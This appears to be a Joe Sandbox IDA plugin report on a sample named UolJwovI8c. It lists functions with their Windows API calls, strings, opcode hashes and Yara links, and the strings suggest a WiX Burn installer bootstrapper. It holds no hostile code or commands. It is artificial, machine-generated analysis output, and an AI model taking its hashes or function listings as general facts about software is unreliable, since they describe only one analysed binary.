Function 005961DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0059620F
GetLastError.KERNEL32 ref: 00596219

Strings

variable.cpp, xrefs: 00596238
Failed to get the user name., xrefs: 00596242
Failed to set variant value., xrefs: 0059625E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastNameUser
String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: 2313c4d42f1c596d996a20166ab39503fd1d46d0768964cf6f712e713bc8e944
Instruction ID: 672f4472c1307d3fa3f9e874d006e0861e5bc0126fc6091cae9b71694d1fee39
Opcode Fuzzy Hash: 2313c4d42f1c596d996a20166ab39503fd1d46d0768964cf6f712e713bc8e944
Instruction Fuzzy Hash: 5201DB36A0122967DF309B559C09AAF7F68BB40710F110157FC14E7281DA649D489BD1

Function 005CFE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,005D04F4,?,?,?,?,00000001), ref: 005CFE40
GetLastError.KERNEL32(?,005D04F4,?,?,?,?,00000001,?,00595616,?,?,00000000,?,?,00595395,00000002), ref: 005CFE4C
LocalFree.KERNEL32(00000000,?,?,00000000,?,?,005D04F4,?,?,?,?,00000001,?,00595616,?,?), ref: 005CFEB5

Strings

logutil.cpp, xrefs: 005CFE6B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: 14be235685fe4b89dbff7bfa7ea76bc61feec2e19239c77142733f1ebea517bf
Instruction ID: 18619e0f6dc7949b3edb5dfbc3b1731f5f7d86c12795e79fc8471f164edce56b
Opcode Fuzzy Hash: 14be235685fe4b89dbff7bfa7ea76bc61feec2e19239c77142733f1ebea517bf
Instruction Fuzzy Hash: D1114632A01129EFDF25ABD58D09FAE7F6AFF54B11F11402AFD0496162D7318A20E7A0

Function 005B6B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,005B6B32,00000000,00000003), ref: 005B6B9F
GetLastError.KERNEL32(?,005B6B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,005B6F28,?), ref: 005B6BA9

Strings

msuuser.cpp, xrefs: 005B6BCD
Failed to set service start type., xrefs: 005B6BD7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ChangeConfigErrorLastService
String ID: Failed to set service start type.$msuuser.cpp
API String ID: 1456623077-1628545019
Opcode ID: 4b99ddfdbfbd034511af09e67fa31e94386b886542145bd0896382ad834878b4
Instruction ID: cd879e4c6c92a200ca974e5f7dc2f4770d9b85c75240d934573a7253f923cfd6
Opcode Fuzzy Hash: 4b99ddfdbfbd034511af09e67fa31e94386b886542145bd0896382ad834878b4
Instruction Fuzzy Hash: F4F0EC33646136779B3026969C0DE8B7E68BF01BB0B110326FD68F61D0DA559D0092E0

Function 005C3C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 005C3D6E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 005C3D78
UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 005C3D85

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: fcb1fc42619f2c7ac2d3762a233f648ddd8f46f87514c6d6f9b446cf43156fd6
Instruction ID: 4a186411df61ad4da9c8b1b5b27659a168285bb1a018bc42514fb414b068d50f
Opcode Fuzzy Hash: fcb1fc42619f2c7ac2d3762a233f648ddd8f46f87514c6d6f9b446cf43156fd6
Instruction Fuzzy Hash: 3A31C27491122D9BCB21DF69D989BCCBBB8BF58310F5045EAE40CA7251EB309F859F44

Function 005C7B87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 005C7C51

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: f6bdb28d9f661677a77380f13aa9c0ca2c9beb9f9be2d5e0fe548188dccc7a15
Instruction ID: 5f43923e591d575be57cbfe3a5e7763bf14bd37e2ad47b2f797d23a95d296c2b
Opcode Fuzzy Hash: f6bdb28d9f661677a77380f13aa9c0ca2c9beb9f9be2d5e0fe548188dccc7a15
Instruction Fuzzy Hash: 8C4105725042196ECB209FB9DC89EBB7BB8FB88714F1046ADF90597580E6719D81CB50

Function 005CA560 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
Instruction ID: 423373c7f967517916fd35c0f494d0c08cc0bd0864b8c4a7d4ddb7d7d228795f
Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
Instruction Fuzzy Hash: 8602FA71E002199FDF14CFA9C880BADBBF1FF88318F25816ED919E7285D731A9418B91

Function 005D3A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D3BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,005D3A8E,?), ref: 005D3C62

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005D3AB2
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005D3AC3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AllocateCheckCloseInitializeMembershipToken
String ID:
API String ID: 2114926846-0
Opcode ID: b3cea814723210f37c8394348ab4d17d4d3f9cadc2b6bd62d050b2726d9c710e
Instruction ID: 05e61a160987bb1c18a1dc99f1fd7826468a5e358e505ec884622d6e17f24744
Opcode Fuzzy Hash: b3cea814723210f37c8394348ab4d17d4d3f9cadc2b6bd62d050b2726d9c710e
Instruction Fuzzy Hash: 24110071A0021EEBDB20DFA9DC89BAFBBB8FF14300F54442FA551E6251E7709A44DB51

Function 005D4440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(005B923A,?,00000100,00000000,00000000), ref: 005D447B
FindClose.KERNEL32(00000000), ref: 005D4487

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ab3ac8fae5b74e989481f3cb7e21da088309ec9eda3458817fbb455f2eef5b01
Instruction ID: a19abc0235e5440eb6cb306000b8c6dccf431135fd8eb7b671750d7638f8c3fa
Opcode Fuzzy Hash: ab3ac8fae5b74e989481f3cb7e21da088309ec9eda3458817fbb455f2eef5b01
Instruction Fuzzy Hash: 1A01D671A0020CABDB20EFA9ED8DAAAB7ACFBD5315F000067F918C3240D6346D49CB54

Function 005C2C18 Relevance: 2.7, Strings: 2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

comres.dll, xrefs: 005C2DBF, 005C2DD8, 005C2E00, 005C2E2B
0, xrefs: 005C2D88

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID: 0$comres.dll
API String ID: 0-3030269839
Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction ID: 40b17c0778ecc172b4d4e665d1f74f05c0bc97e61c39d1469d8622f9301f8b87
Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction Fuzzy Hash: EB517E60200B097FDF3889E8859AFBF2F99FB65740F184D1DE443DB292C619DE468392

Function 005CEE7C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005CEE77,?,?,00000008,?,?,005CEB17,00000000), ref: 005CF0A9

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 9be4dbf44fe02577f94d4fec1b85b98ee00e7b96b1a86f0ca71de781e0a0e8fb
Instruction ID: 3288910d251a55e694e7628c85a4154d0a8ea6d0ff88e8a6e666cb5bc9f706c1
Opcode Fuzzy Hash: 9be4dbf44fe02577f94d4fec1b85b98ee00e7b96b1a86f0ca71de781e0a0e8fb
Instruction Fuzzy Hash: F1B11735610609DFD719CF68C48AB657FA1FF45364F29866CE89ACF2A2C335E981CB40

Function 005BEC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005BEC20

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 665df4b91cc8a9224af25eccb04bc12b4dee2e8647d72dfc19aaae10b120b14d
Instruction ID: 76c341ee62f2dd713754b6df2fdc90a99a60768c01e752fdbd8d1e8e31d9eecf
Opcode Fuzzy Hash: 665df4b91cc8a9224af25eccb04bc12b4dee2e8647d72dfc19aaae10b120b14d
Instruction Fuzzy Hash: 19517DB1D002058FDB18CF99D8866EABFF8FB58300F18856AD409EB250E3B5AD04DF52

Function 005BE9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,005BE131), ref: 005BE9E1

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bf8a8ea50756fe69e4a9f11c6d5fcf7c2bc7dd99e1ea5805081fc756a1e0ff77
Instruction ID: 70f779cb269009aa07b002d9f109079dae9a28571dd965994869d64c4533ffe2
Opcode Fuzzy Hash: bf8a8ea50756fe69e4a9f11c6d5fcf7c2bc7dd99e1ea5805081fc756a1e0ff77
Instruction Fuzzy Hash:

Function 005BFB89 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1dd6ade80bff7e269b047d29a5364b54bd5901c25518f1b24d50e0c3abbe0c
Instruction ID: 7ba1afd7b4315d464d90deea663b930fb476c752f09d449a3b69dec5490bdc33
Opcode Fuzzy Hash: 8f1dd6ade80bff7e269b047d29a5364b54bd5901c25518f1b24d50e0c3abbe0c
Instruction Fuzzy Hash: CE02F6321085A20FDB6D4A3988705BB7FE17A433B071E57ADD8B6CB0D6DE20E964D760

Function 005C0B6F Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
Instruction ID: b05bbeb3ec4c818ae056d30ea25da6211be5b9d4588db3393430fc50b335b1fc
Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
Instruction Fuzzy Hash: B9C189331051A28FDF6D43B98434A7EFFA16A927B131E2B9DD4B2CB0D5EE109935D620

Function 005C07AA Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
Instruction ID: 933b51081c6dbd7e8ceb0b7775afd33bb73cae8733eca163baad2a5f7464eeee
Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
Instruction Fuzzy Hash: 68C1A4331051A28EEF6D42B98434A7EFFE16E827B031E679DD4F2CB1C5EE209565D620

Function 005C03D5 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
Instruction ID: 6664b20f7e94d03c142bb8e885fdef11892b2683ecc7fc5e6569a402bed7903b
Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
Instruction Fuzzy Hash: 79C1B6321051A28FEF2D46798474A7FBFE16A927B031A279DD4F2CB1D1EE20D574DA20

Function 005C001D Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
Instruction ID: 35020778c50089ee0e9ddef526867ad18c45481e312cc6daef43c9c77f79b192
Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
Instruction Fuzzy Hash: EBB1A8361051A28FDF2D42B98434A7EFFE17A927B131F2B9DD4B2CB1C5EE209525D620

Function 005C2E47 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f30c15015adafe9e33c4c3a84a90512605798767ea844a9afca85e434370162
Instruction ID: c0c9e8fdf8c4cb022d9a8d7fb5155d54e66f9d1da64a7d0c6cbca0b106f7f825
Opcode Fuzzy Hash: 0f30c15015adafe9e33c4c3a84a90512605798767ea844a9afca85e434370162
Instruction Fuzzy Hash: F9617B7120030D9EDB3899E8885BFBE6FA9FB81700F14481DF982EF281E655DE81C655

Function 0059CDBD Relevance: 86.1, APIs: 3, Strings: 46, Instructions: 366COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,comres.dll,00000000,005DCA9C,?,00000000), ref: 0059CEF3

Strings

FilePath, xrefs: 0059CEAB
Payload, xrefs: 0059CDD8
CertificateRootPublicKeyIdentifier, xrefs: 0059D03D
SourcePath, xrefs: 0059CFB0
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0059D1B9
Failed to find catalog., xrefs: 0059D1CE
embedded, xrefs: 0059CF05
Failed to select payload nodes., xrefs: 0059CDEB
feclient.dll, xrefs: 0059CF8C
Failed to get @LayoutOnly., xrefs: 0059D197
Failed to parse @FileSize., xrefs: 0059D1A1
Failed to get @Id., xrefs: 0059D221
Failed to get @CertificateRootThumbprint., xrefs: 0059D1C7
Packaging, xrefs: 0059CEC6
external, xrefs: 0059CF21
Catalog, xrefs: 0059D0EC
download, xrefs: 0059CEE5
wininet.dll, xrefs: 0059D10E
Failed to get @FilePath., xrefs: 0059D21A
Failed to get @SourcePath., xrefs: 0059D1F1
Failed to get next node., xrefs: 0059D228
msi.dll, xrefs: 0059D05F
Failed to hex decode @CertificateRootThumbprint., xrefs: 0059D1C0
payload.cpp, xrefs: 0059CE3F
comres.dll, xrefs: 0059CEAA
Failed to get @DownloadUrl., xrefs: 0059D1EA
Failed to get @FileSize., xrefs: 0059D1AB
Failed to allocate memory for payload structs., xrefs: 0059CE49
Container, xrefs: 0059CF4B
Failed to get payload node count., xrefs: 0059CE10
Failed to to find container: %ls, xrefs: 0059D186
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0059D1B2
FileSize, xrefs: 0059D002
CertificateRootThumbprint, xrefs: 0059D07A
msasn1.dll, xrefs: 0059D024
LayoutOnly, xrefs: 0059CF8D
Invalid value for @Packaging: %ls, xrefs: 0059D200
version.dll, xrefs: 0059D063
Failed to get @Catalog., xrefs: 0059D1D5
Failed to hex decode the Payload/@Hash., xrefs: 0059D1DC
Failed to get @Container., xrefs: 0059D18D
DownloadUrl, xrefs: 0059CFD9
cabinet.dll, xrefs: 0059D0A0
Failed to get @Packaging., xrefs: 0059D213
Failed to get @Hash., xrefs: 0059D1E3
Hash, xrefs: 0059D0B7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateCompareProcessString
String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$cabinet.dll$comres.dll$download$embedded$external$feclient.dll$msasn1.dll$msi.dll$payload.cpp$version.dll$wininet.dll
API String ID: 1171520630-1949177747
Opcode ID: e0e541147146a3c78b57b36cdb6716b107c2a390b6d339fe37e4ef9f300c307b
Instruction ID: 7eba54aa2569d257832b0953d5bb6736ef0ad8a548e164ed4530e606af700717
Opcode Fuzzy Hash: e0e541147146a3c78b57b36cdb6716b107c2a390b6d339fe37e4ef9f300c307b
